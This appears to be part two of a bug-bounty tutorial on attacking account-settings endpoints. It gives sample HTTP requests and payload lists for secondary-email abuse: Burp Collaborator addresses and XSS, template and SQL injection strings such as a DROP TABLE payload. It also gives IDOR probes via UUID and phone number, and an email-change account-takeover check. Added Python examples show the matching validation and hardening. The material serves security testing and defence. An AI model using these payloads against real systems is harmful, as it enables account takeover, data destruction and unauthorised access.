This post is the second part of the series; the earlier part is:
Method 8
If the target's business system lets a user add a second email address, try adding an address on the company's own domain, for example any@company.com, which may grant extra privileges.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=any@company.com&action=add&token=CSRF
Method 9
If the target's business system lets a user add a second email address, try adding a company-domain address that contains two @ signs, for example any@gmail.com@company.com, which may grant extra privileges.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=any@gmail.com@company.com&action=add&token=CSRF
Method 10
If the target's business system lets a user add a second email address, try a Burp Collaborator email address; a backend interaction may reveal sensitive information.
me@id.collaborator.net
user(;me@id.collaborator.net)@gmail.com
me@id.collaborator.net(@gmail.com)
me+(@gmail.com)@id.collaborator.net
<me@id.collaborator.net>user@gmail.com
Method 11
If the target's business system lets a user add a second email address, try the following payloads; XSS, SSTI or SQLi may be waiting to be found.
me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
%@gmail.com
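Methods 8 to 11 all go through the same "add a secondary email" endpoint, and all of them rely on the server accepting more than a plain local@domain address. The following is an added example of server-side validation (not code from the original post): it refuses the company's own domain for self-registration, a second @, comments, quoted local parts, angle brackets and domain literals, so every payload listed above is rejected before it reaches a mailer, template or query. The INTERNAL_DOMAINS value and the function names are assumptions made for this example.

```python
import re
from typing import Tuple

# Added example (not code from the original post). Placeholder policy: the
# organisation's own domain is "company.com" (the domain used in the post's
# sample requests) and end users may not self-register addresses on it.
INTERNAL_DOMAINS = {"company.com"}

# Deliberately narrow grammar. RFC 5322 permits comments "(...)", quoted local
# parts, angle brackets and domain literals "[...]", but an account-settings
# form has no reason to accept them; refusing them removes the parser-confusion
# and injection surface the payloads above depend on.
LOCAL_RE = re.compile(r"^[A-Za-z0-9._+-]{1,64}$")
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def validate_secondary_email(raw: str) -> Tuple[bool, str]:
    """Return (accepted, reason). The reason is for the audit log, not the user."""
    if len(raw) > 254:
        return False, "too long"
    if raw.count("@") != 1:
        # Method 9 shape (two @), and every Collaborator payload that hides a
        # second address inside a comment or angle brackets.
        return False, "exactly one @ required"
    local, domain = raw.split("@")
    if not LOCAL_RE.match(local):
        # Methods 10/11: comments, quotes, <script>, template and SQL characters.
        return False, "local part has disallowed characters"
    labels = domain.lower().split(".")
    if len(labels) < 2 or not all(LABEL_RE.match(label) for label in labels):
        # Domain literal me@[host] or injected text in the domain part.
        return False, "domain is not a plain hostname"
    if domain.lower() in INTERNAL_DOMAINS:
        # Method 8: any@company.com must not be self-assignable.
        return False, "internal domain cannot be added by users"
    return True, "ok"


def filter_batch(addresses):
    """Split a batch into (accepted, rejected) lists, e.g. to review a log sample."""
    accepted, rejected = [], []
    for addr in addresses:
        ok, reason = validate_secondary_email(addr)
        (accepted if ok else rejected).append((addr, reason))
    return accepted, rejected
```

The rejection reason is kept separate from the user-facing response so that a spike in "exactly one @ required" or "local part has disallowed characters" in the audit log can be alerted on as a sign that the endpoint is being probed.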
Method 12
If there is an edit function keyed by UUID, try another account's UUID and check for IDOR.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=me@gmail.com&uuid=Your-UUID&token=CSRF
Method 13
When changing the email from Attacker@gmail.com to Victim@Gmail.com, check whether the verification code is also sent to Attacker@gmail.com; if it is, this is an account takeover vulnerability.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

newemail=victim@gmail.com&token=CSRF
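The flaw in Method 13 is that the confirmation code for a new address reaches a mailbox other than the one being claimed. As an added example (not code from the original post), the flow below sends the code only to the requested address, sends the current address a notice that carries no code, and makes the code single-use, time-limited and compared in constant time. The in-memory OUTBOX, PENDING and USERS stores and the sample addresses are constructed stand-ins for a mail sender, session store and user table.

```python
import hmac
import secrets
import time
from typing import Dict, List, Set

# Added example, not the post's code. Everything here is an in-memory stand-in
# for a real mail sender, pending-change store and user table.
OUTBOX: List[Dict[str, str]] = []           # every message "sent", with its recipient
PENDING: Dict[str, Dict[str, object]] = {}  # user_id -> pending change request
USERS: Dict[str, str] = {"user-1": "current-owner@example.com"}  # constructed sample
CODE_TTL_SECONDS = 600


def _send(to: str, subject: str, body: str) -> None:
    OUTBOX.append({"to": to, "subject": subject, "body": body})


def request_email_change(user_id: str, new_email: str) -> None:
    """Step 1: the code goes only to the address being claimed."""
    code = secrets.token_hex(16)
    PENDING[user_id] = {"new_email": new_email, "code": code,
                        "expires": time.time() + CODE_TTL_SECONDS}
    _send(new_email, "Confirm your new address", f"Your code: {code}")
    # The current address gets a notice without the code, so the account holder
    # learns of the attempt but nothing in that mailbox can complete it.
    _send(USERS[user_id], "Email change requested",
          "A request was made to change your address. If this was not you, contact support.")


def confirm_email_change(user_id: str, code: str) -> bool:
    """Step 2: constant-time compare, single use, time-limited."""
    req = PENDING.get(user_id)
    if req is None or time.time() > float(req["expires"]):
        return False
    if not hmac.compare_digest(str(req["code"]), code):
        return False
    USERS[user_id] = str(req["new_email"])
    del PENDING[user_id]          # single use: a replay of the same code fails
    return True


def recipients_of_code(code: str) -> Set[str]:
    """Audit helper: every address that ever received a message containing this code."""
    return {m["to"] for m in OUTBOX if code in m["body"]}
```

recipients_of_code is the check a reviewer would run against the outbox of a test environment: for any pending change it must return exactly one address, the new one.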
Method 14
If there is an edit function based on the phone number, for example a password change, try another account's phone number and test for IDOR.
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

newPass=****&phone=Phone-Another-Account&token=CSRF
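Methods 12 and 14 are the same bug twice: the server trusts a client-supplied identifier (uuid, phone) to select which account is edited. The following added example (not code from the original post) shows the hardened handlers, which always operate on the account bound to the session and treat a disagreeing identifier as a security event to refuse and log rather than ignore. The Account records, UUIDs, phone numbers and the "kdf$" password placeholder are constructed for this example.

```python
from dataclasses import dataclass
from typing import Dict, List

# Added example, not the post's code. Constructed sample accounts; the UUIDs,
# addresses and phone numbers are placeholders.
@dataclass
class Account:
    uuid: str
    email: str
    phone: str
    password_hash: str


ACCOUNTS: Dict[str, Account] = {
    "uuid-alice": Account("uuid-alice", "alice@example.com", "+10000000001", "kdf$a"),
    "uuid-bob": Account("uuid-bob", "bob@example.com", "+10000000002", "kdf$b"),
}

# Audit log. A client-supplied identifier that disagrees with the session is the
# detection signal for the two IDOR probes above; it is recorded, never silently dropped.
AUDIT: List[Dict[str, str]] = []


def _audit(actor: str, event: str, **detail: str) -> None:
    AUDIT.append({"actor": actor, "event": event, **detail})


def update_email(session_uuid: str, form: Dict[str, str]) -> Dict[str, object]:
    """Method 12 hardened: the record edited is always the session's own."""
    acct = ACCOUNTS[session_uuid]
    claimed = form.get("uuid")
    if claimed is not None and claimed != session_uuid:
        _audit(session_uuid, "idor_attempt", field="uuid", claimed=claimed)
        return {"ok": False, "error": "forbidden"}
    acct.email = form["email"]
    _audit(session_uuid, "email_changed")
    return {"ok": True}


def change_password(session_uuid: str, form: Dict[str, str]) -> Dict[str, object]:
    """Method 14 hardened: the phone is read from the session account, never
    trusted from the request; a mismatch is refused and logged."""
    acct = ACCOUNTS[session_uuid]
    claimed_phone = form.get("phone")
    if claimed_phone is not None and claimed_phone != acct.phone:
        _audit(session_uuid, "idor_attempt", field="phone", claimed=claimed_phone)
        return {"ok": False, "error": "forbidden"}
    # Placeholder for a real password KDF (argon2/scrypt/bcrypt) in production.
    acct.password_hash = "kdf$" + form["newPass"]
    _audit(session_uuid, "password_changed")
    return {"ok": True}


def idor_attempts_by(actor: str) -> int:
    """Count cross-account attempts from one session, for alerting or rate limiting."""
    return sum(1 for e in AUDIT if e["actor"] == actor and e["event"] == "idor_attempt")
```

Dropping the uuid and phone parameters from the form entirely is the cleaner fix; keeping them only as a consistency check, as above, has the advantage that a probe of this kind shows up in the audit log instead of vanishing.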
References
https://hackerone.com/reports/565883
https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5
https://www.youtube.com/watch?v=cThFNXrBYQU
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
https://twitter.com/intigriti/status/1318532648734773249
https://www.youtube.com/watch?time_continue=12&v=cbJ4NSYsUto&feature=emb_logo
https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://hackerone.com/reports/95552
https://hackerone.com/reports/950881
https://hackerone.com/reports/969223
https://hackerone.com/reports/974222